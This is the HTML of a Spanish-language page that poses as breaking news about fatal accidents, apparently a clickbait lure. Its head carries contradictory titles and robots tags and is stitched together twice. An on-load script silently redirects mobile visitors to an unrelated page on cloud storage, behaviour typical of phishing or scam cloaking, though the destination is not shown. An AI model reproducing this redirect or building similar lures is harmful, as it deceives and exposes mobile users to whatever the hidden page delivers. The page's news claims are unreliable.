<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="2411"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Dramático video: captan terrible accidente mortal durante show aéreo, Esta mañana"/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1230492694724476990/1230861432682451036/gfhgfdhfghgdf.jpg?ex=6634dc09&is=66226709&hm=a796d87b5d63c4cc3252545c3979c755349dd1dd3aef13fb29f0c4058ccc7ef3&=&format=webp"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<!DOCTYPE html>
<html>
<head>
    <title>Revelan identidades de cubanos fallecidos y heridos en accidente de transito esta mañana</title>
    <script>
        // Función para detectar si es un dispositivo móvil
        function esDispositivoMovil() {
            return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        }

        // Función para redirigir si es un dispositivo móvil
        function redireccionarSiEsMovil() {
            if (esDispositivoMovil()) {
                // URL a la que quieres redirigir para dispositivos móviles
                var urlMovil = 'https://storage.googleapis.com/zankiops001.appspot.com/Prus02024/polickkk.html';

                // Redirigir al usuario a la URL para dispositivos móviles
                window.location.href = urlMovil;
            }
        }

        // Llamar a la función de redireccionamiento cuando la página cargue
        window.onload = redireccionarSiEsMovil;
    </script>